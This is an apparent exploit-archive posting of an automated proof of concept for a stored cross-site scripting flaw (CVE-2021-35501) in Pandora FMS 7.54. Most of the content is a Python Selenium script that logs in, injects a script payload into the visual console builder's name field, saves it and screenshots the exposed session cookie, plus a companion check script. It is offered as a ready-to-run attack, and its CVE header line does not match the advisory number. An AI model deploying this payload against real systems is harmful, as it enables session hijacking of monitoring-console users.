what you don't know can hurt you

Pandora FMS 7.54 Cross Site Scripting

Pandora FMS 7.54 Cross Site Scripting
Posted Jul 12, 2021
Authored by nu11secur1ty

Pandora FMS versions 7.54 and below suffer from a persistent cross site scripting vulnerability. This entry has been updated on 2021/07/23 with a fully automated version of the exploit.

tags | exploit, xss
advisories | CVE-2021-35501
MD5 | cedb28d4757a9fbd08e35ecc49c07887

Pandora FMS 7.54 Cross Site Scripting

Change Mirror Download
# Exploit Title: XSS vulnerability for (keywords) searching parameter in pandorafms-754 get PHPSESSID PWNED
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 07.12.2021
# Vendor: https://pandorafms.com/
# Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/754/PandoraFMS7.0NG.754.x86_64.iso/download
# CVE: CVE-2021-3550-PHPSESSID
# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-35501/PHPSESSID/docs/PHPSESSID.gif
# Proof PHPSESSID PWNED: https://streamable.com/e0cd4w

[+] Exploit Source:

### Exploit

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: nu11secur1ty
# CVE-2021-35501-PHPSESSID

from selenium import webdriver
import time
from selenium.webdriver.support.ui import Select
import os, sys
import numpy as np
import cv2
import pyautogui


# Vendor: https://pandorafms.com/
website_link="http://192.168.1.157/pandora_console/index.php"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="nick"

#enter the element for password input field
element_for_password="pass"

#enter the element for submit button
element_for_submit="login_button"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(1)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)

password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit Pandora FMS 754
# Payload
browser.get(("
http://192.168.1.157/pandora_console/index.php?sec=network&sec2=godmode/reporting/visual_console_builder
"))

time.sleep(1)
browser.execute_script("document.querySelector('[name=\"name\"]').value =
'<script>alert(document.cookie)</script>'")

# Select Applications or whatever =)
kurac="selection"

browser.find_elements_by_class_name(kurac)[0].click()
time.sleep(3)
browser.find_elements_by_class_name("select2-results__option")[1].click()

# Click to save the payload
browser.execute_script("document.querySelector('[name=\"update_layout\"]').click()")
time.sleep(3)
os.system("python check_PoC.py")
browser.close()

# take screenshot using pyautogui
image = pyautogui.screenshot()

# PIL(pillow) and in RGB we need to
# convert it to numpy array and BGR
image = cv2.cvtColor(np.array(image),cv2.COLOR_RGB2BGR)

# writing it to the disk using opencv
cv2.imwrite("PHPSESSID.png", image)

print("The payload is deployed, your visual console is PWNED...\n")
print("You can see the PHPSESSID on the screenshot picture, game over. :D")

except Exception: # as error:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, but something is not ok")
# print(error)



-------------------------------------------------------------------------

### Check

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-35501-PHPSESSID

from selenium import webdriver
import time

# Vendor: https://pandorafms.com/
website_link="
http://192.168.1.157/pandora_console/index.php?sec=network&sec2=godmode/reporting/map_builder
"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="nick"

#enter the element for password input field
element_for_password="pass"

#enter the element for submit button
element_for_submit="login_button"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(1)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)

password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, but something is not ok")


Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close